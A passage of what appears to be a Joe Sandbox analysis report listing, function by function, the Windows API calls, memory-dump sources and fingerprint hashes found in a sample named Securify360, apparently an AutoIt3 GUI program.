                                                                                              • Instruction Fuzzy Hash: 7111BE72900109AFCB10FFA4CD46CEEB7B8BF19310B108065F542A72A1DF75AE10EBA1
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00FE9719
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FE972B
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FE9741
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FE975C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 269075c7199f4f0132d4f666fbe35c7587ed2fc51a570b5613c02fd38bf8a4dd
                                                                                              • Instruction ID: ccb0fd0e64d57854b1a7b1ae6902ef6fa7157404c6a7428590078fa4e8c9b2c8
                                                                                              • Opcode Fuzzy Hash: 269075c7199f4f0132d4f666fbe35c7587ed2fc51a570b5613c02fd38bf8a4dd
                                                                                              • Instruction Fuzzy Hash: A811483A901218FFEB10DF95C984E9DBBB8FB48710F204091E900B7294D6716E14EBA0
                                                                                              APIs
                                                                                                • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                                                              • DefDlgProcW.USER32(?,00000020,?), ref: 00F916B4
                                                                                              • GetClientRect.USER32(?,?), ref: 00FCB93C
                                                                                              • GetCursorPos.USER32(?), ref: 00FCB946
                                                                                              • ScreenToClient.USER32(?,?), ref: 00FCB951
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 4127811313-0
                                                                                              • Opcode ID: 90427324f792690c7b4833556d30e9cd2593b38672a2d23ac71ad9b171e4edac
                                                                                              • Instruction ID: 74baea43e4431419af5f99f948245f74b1f1d5cb6e2dd05e4484d21ec44ae862
                                                                                              • Opcode Fuzzy Hash: 90427324f792690c7b4833556d30e9cd2593b38672a2d23ac71ad9b171e4edac
                                                                                              • Instruction Fuzzy Hash: 8C112835A0011AABDF20EF54D885DFE77B8FB04300F540465FA91E7144C735BA51EBA1
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F9214F
                                                                                              • GetStockObject.GDI32(00000011), ref: 00F92163
                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9216D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3970641297-0
                                                                                              • Opcode ID: 7aa412be6f23aea009897b5bc44e2a56e6274bea5d707637117474eae63f506d
                                                                                              • Instruction ID: 684817828c852da64cbec713a271ac78a05e71eceb077190c9343384e00950a8
                                                                                              • Opcode Fuzzy Hash: 7aa412be6f23aea009897b5bc44e2a56e6274bea5d707637117474eae63f506d
                                                                                              • Instruction Fuzzy Hash: 47115B72901649BFEF624E909C45EEBBB6DFF58764F150116FA0452118C7369CA0EBA0
                                                                                              APIs
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FF04EC,?,00FF153F,?,00008000), ref: 00FF195E
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00FF04EC,?,00FF153F,?,00008000), ref: 00FF1983
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FF04EC,?,00FF153F,?,00008000), ref: 00FF198D
                                                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,00FF04EC,?,00FF153F,?,00008000), ref: 00FF19C0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                              • String ID:
                                                                                              • API String ID: 2875609808-0
                                                                                              • Opcode ID: 723524c4afd4019859d5940bf6aca17f3141512e3dcb43f2b1dfd466b186c224
                                                                                              • Instruction ID: 6996a66d761aeacbd36649b1390aa536d2135c9424921947c1549370ddadcb78
                                                                                              • Opcode Fuzzy Hash: 723524c4afd4019859d5940bf6aca17f3141512e3dcb43f2b1dfd466b186c224
                                                                                              • Instruction Fuzzy Hash: 70114831C0061DDBDF209FA5D999AEEBB78BF08751F104045EA80B2258CB7596609BD1
                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0101E1EA
                                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0101E201
                                                                                              • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0101E216
                                                                                              • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0101E234
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Type$Register$FileLoadModuleNameUser
                                                                                              • String ID:
                                                                                              • API String ID: 1352324309-0
                                                                                              • Opcode ID: ca45e39d6870ffb7937cf6c1efd3f34bdd32d794edc124c701a244623a368164
                                                                                              • Instruction ID: 4b819e56b3701c97d4db57ff6f52e55b9558f414fd175a4a6d3d251c1492bd20
                                                                                              • Opcode Fuzzy Hash: ca45e39d6870ffb7937cf6c1efd3f34bdd32d794edc124c701a244623a368164
                                                                                              • Instruction Fuzzy Hash: 2F113CB52053059FE3318F51DD08BDBBBBCEB04B00F108559EA9696048D7B9E5089BA1
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                              • String ID:
                                                                                              • API String ID: 3016257755-0
                                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction ID: 1eda606e9b13eda0e5e1571c774ea07fd6f8db11a037b0980631c4897bc2c239
                                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction Fuzzy Hash: 27017B3244824EBBCF126E85CE02EEE3F26BB59350B188519FA1858131C236C9B1BF81
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 0101B956
                                                                                              • ScreenToClient.USER32(?,?), ref: 0101B96E
                                                                                              • ScreenToClient.USER32(?,?), ref: 0101B992
                                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0101B9AD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 357397906-0
                                                                                              • Opcode ID: 7460960dc5f0286ff395ebb38bc3ae42b6a7bc994de1bd31c1f4a5c033b1de3b
                                                                                              • Instruction ID: 0424455caba2f33920e8d4620dd2447bdda727bad77aed863c1d2f4c9cff5538
                                                                                              • Opcode Fuzzy Hash: 7460960dc5f0286ff395ebb38bc3ae42b6a7bc994de1bd31c1f4a5c033b1de3b
                                                                                              • Instruction Fuzzy Hash: 031172B9D00209EFDB51CFA8D584AEEFBF9FF48210F108166E954E3614D735AA618F90
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 0101BCB6
                                                                                              • _memset.LIBCMT ref: 0101BCC5
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01058F20,01058F64), ref: 0101BCF4
                                                                                              • CloseHandle.KERNEL32 ref: 0101BD06
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3277943733-0
                                                                                              • Opcode ID: f3df5aefcf69fc49e84e4313b3e5a1365d8f6110cfdb2c962acae02a86c03a2f
                                                                                              • Instruction ID: 17cc1e210676e44e576ec64d86b577012cf992036c63d3392a7ba7b542b75220
                                                                                              • Opcode Fuzzy Hash: f3df5aefcf69fc49e84e4313b3e5a1365d8f6110cfdb2c962acae02a86c03a2f
                                                                                              • Instruction Fuzzy Hash: E6F05EB25403047FE3603B67AC06FBB3A5DEB0C754F008422FF89D518AE77A481097A8
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00FF71A1
                                                                                                • Part of subcall function 00FF7C7F: _memset.LIBCMT ref: 00FF7CB4
                                                                                              • _memmove.LIBCMT ref: 00FF71C4
                                                                                              • _memset.LIBCMT ref: 00FF71D1
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00FF71E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 48991266-0
                                                                                              • Opcode ID: eaafe466d53aad402e33efcdb0326ea8f8b34dbd42d65b2466972635e2c529a5
                                                                                              • Instruction ID: db6f43e8b3dd3c5ec0fdcf95df83620c057646dbc87f89173ec42cf86b605e39
                                                                                              • Opcode Fuzzy Hash: eaafe466d53aad402e33efcdb0326ea8f8b34dbd42d65b2466972635e2c529a5
                                                                                              • Instruction Fuzzy Hash: 3AF05436200104ABCF117F55DC85A9ABB29EF45360F04C051FE085E21AC736A915EBB4
                                                                                              APIs
                                                                                                • Part of subcall function 00F916CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F91729
                                                                                                • Part of subcall function 00F916CF: SelectObject.GDI32(?,00000000), ref: 00F91738
                                                                                                • Part of subcall function 00F916CF: BeginPath.GDI32(?), ref: 00F9174F
                                                                                                • Part of subcall function 00F916CF: SelectObject.GDI32(?,00000000), ref: 00F91778
                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0101C3E8
                                                                                              • LineTo.GDI32(00000000,?,?), ref: 0101C3F5
                                                                                              • EndPath.GDI32(00000000), ref: 0101C405
                                                                                              • StrokePath.GDI32(00000000), ref: 0101C413
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                              • String ID:
                                                                                              • API String ID: 1539411459-0
                                                                                              • Opcode ID: 64f7d0fbec30b0f890c6629e884d9bb626e0abea0ab2ab1ffbe4f7f3e95af2c2
                                                                                              • Instruction ID: ce2664733d59225f09323eddb5d143efb1de22016a1b2137c726b717ddd6440c
                                                                                              • Opcode Fuzzy Hash: 64f7d0fbec30b0f890c6629e884d9bb626e0abea0ab2ab1ffbe4f7f3e95af2c2
                                                                                              • Instruction Fuzzy Hash: C4F0BE31085319BBFB322F54AC0AFDE3F99AF05310F288040FA91210D9877E6190EBA9
                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FEAA6F
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FEAA82
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00FEAA89
                                                                                              • AttachThreadInput.USER32(00000000), ref: 00FEAA90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2710830443-0
                                                                                              • Opcode ID: b8fadc57cd708e0a4b821fe503559ba36fd4d6ed78862121359984dbac580706
                                                                                              • Instruction ID: 4bd96c9038fad35935f9d8775ea45e9732fd7faa3e8aeb25c047bbc368b7661a
                                                                                              • Opcode Fuzzy Hash: b8fadc57cd708e0a4b821fe503559ba36fd4d6ed78862121359984dbac580706
                                                                                              • Instruction Fuzzy Hash: 86E06D31941328BBEB315EA2DD0CEE77F1CEF15BA1F208021F54985058C77A9540DBE0
                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000008), ref: 00F9260D
                                                                                              • SetTextColor.GDI32(?,000000FF), ref: 00F92617
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00F9262C
                                                                                              • GetStockObject.GDI32(00000005), ref: 00F92634
                                                                                              • GetWindowDC.USER32(?,00000000), ref: 00FCC1C4
                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FCC1D1
                                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 00FCC1EA
                                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 00FCC203
                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 00FCC223
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00FCC22E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1946975507-0
                                                                                              • Opcode ID: fae3eb62e42c0391b3df3929036204fd8c8f23e23d106431f2a670bce9cca75f
                                                                                              • Instruction ID: 4a37b597d8f8ae38b7c7e5562e96c381cc94d6f6c42fed13b0935fafdf819a28
                                                                                              • Opcode Fuzzy Hash: fae3eb62e42c0391b3df3929036204fd8c8f23e23d106431f2a670bce9cca75f
                                                                                              • Instruction Fuzzy Hash: AFE06531904344BFDF315F64A809BD83B11EB05331F248366FAAD480DD87764580DB11
                                                                                              APIs
                                                                                              • GetCurrentThread.KERNEL32 ref: 00FE9339
                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00FE8F04), ref: 00FE9340
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00FE8F04), ref: 00FE934D
                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00FE8F04), ref: 00FE9354
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                                              • String ID:
                                                                                              • API String ID: 3974789173-0
                                                                                              • Opcode ID: 9966f6956f6bb0f36aab13199f7d3157dc6ebfd3d2c63d0189c3435592652954
                                                                                              • Instruction ID: 2e59c9a1aa859b8050a9b8c9d3db7ffd9e3145bb1f73d5cf90b890865df5718b
                                                                                              • Opcode Fuzzy Hash: 9966f6956f6bb0f36aab13199f7d3157dc6ebfd3d2c63d0189c3435592652954
                                                                                              • Instruction Fuzzy Hash: D6E04F72A013119FE7305FB25D0DB563B6CAF557A1F208858F285D9088E67D9444C760
                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 00FD0679
                                                                                              • GetDC.USER32(00000000), ref: 00FD0683
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FD06A3
                                                                                              • ReleaseDC.USER32(?), ref: 00FD06C4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: 46590aef32ff311cae1e388baac6fd11d13b1dcf012a5b8c994722848767f820
                                                                                              • Instruction ID: bb5734f17cf08a10b02ae8c4d83e586a40859a077f6c98b914fb17853288eb04
                                                                                              • Opcode Fuzzy Hash: 46590aef32ff311cae1e388baac6fd11d13b1dcf012a5b8c994722848767f820
                                                                                              • Instruction Fuzzy Hash: 7AE0C275800304EFDB319FA09808A5D7BA1AB9C311F218005F89AA6608CA399542AF50
                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 00FD068D
                                                                                              • GetDC.USER32(00000000), ref: 00FD0697
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FD06A3
                                                                                              • ReleaseDC.USER32(?), ref: 00FD06C4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: a50715442b2aabe6ed98151d4422ad73a15b4cbac3e580f14e51b47ec0e007f1
                                                                                              • Instruction ID: 4c795a3ed9038f6c520de5c7d237bef90cecd800bc8fbe8f921d09429fecce83
                                                                                              • Opcode Fuzzy Hash: a50715442b2aabe6ed98151d4422ad73a15b4cbac3e580f14e51b47ec0e007f1
                                                                                              • Instruction Fuzzy Hash: 39E0EEB5800304AFDF319FA0D80CA9D7BA1AB9C311F208009F99AA7208CB3E95429F50
                                                                                              APIs
                                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 00FEC057
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContainedObject
                                                                                              • String ID: AutoIt3GUI$Container
                                                                                              • API String ID: 3565006973-3941886329
                                                                                              • Opcode ID: 7ad30e7d8bd6f44d9c82c57f767d37a2782e667a8ca4817c6a52b4510a08cc7f
                                                                                              • Instruction ID: 53f5df6801c0035ff34387cc3f29ef9d8eb6d4fe44331119b26e79412b5fe268
